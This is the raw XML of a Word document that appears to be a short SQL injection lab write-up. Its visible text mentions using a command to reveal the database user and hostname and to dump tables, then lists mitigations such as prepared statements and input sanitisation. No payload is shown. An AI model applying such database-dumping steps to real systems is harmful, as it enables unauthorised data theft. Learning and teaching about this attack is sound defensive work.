          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">By using this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can found current user, current database, hostname as shown in below image.</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258256" cy="1760373"/>
            <wp:effectExtent l="0" t="0" r="0" b="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258256" cy="1760373"/>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we are trying to find tables and dump them as shown below.</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5951220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="103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rcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="595122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are the resultant tables.</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2727960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="103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rcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="0">
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="272796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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mitigations: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Don’t use dynamic SQL</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Sanitize user-provided inputs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Encrypt private/confidential data being stored in the database</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Limit database permissions and privileges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a Web Application Firewall (WAF) for web applications that access databases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secure coding and SDLC practices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input validation and sanitation</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stored procedures and parametrization</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prepared statements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program analysis techniques and proxies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>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Gautami">
    <w:altName w:val="Gautami"/>
    <w:panose1 w:val="020b0502040000020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00200003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:altName w:val="Calibri Light"/>
    <w:panose1 w:val="020f0302020000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1D2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6608E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6CFC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FF340B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0000004"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDFA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F3BA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76AC0286"/>
    <w:lvl w:ilvl="0">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7">
    <w:nsid w:val="00000007"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="499084F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hybridMultilevel"/>
    <w:tmpl w:val="BBC05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8FA8BDF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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10">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Gautami"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563c1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="style4097">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="style65"/>
    <w:next w:val="style4097"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:val="clear" w:color="auto" w:fill="e1dfdd"/>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3.jpe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Words>900</Words>
  <Pages>8</Pages>
  <Characters>5177</Characters>
  <Application>WPS Office</Application>
  <DocSecurity>0</DocSecurity>
  <Paragraphs>105</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6213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2024-02-25T15:38:00Z</dcterms:created>
  <dc:creator>Azeez saginala</dc:creator>
  <lastModifiedBy>RMX3392</lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-27T05:47:33Z</dcterms:modified>
  <revision>6</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8ae60aa0228541fe930ee4c4a27424e3</vt:lpwstr>
  </property>
</Properties>
</file>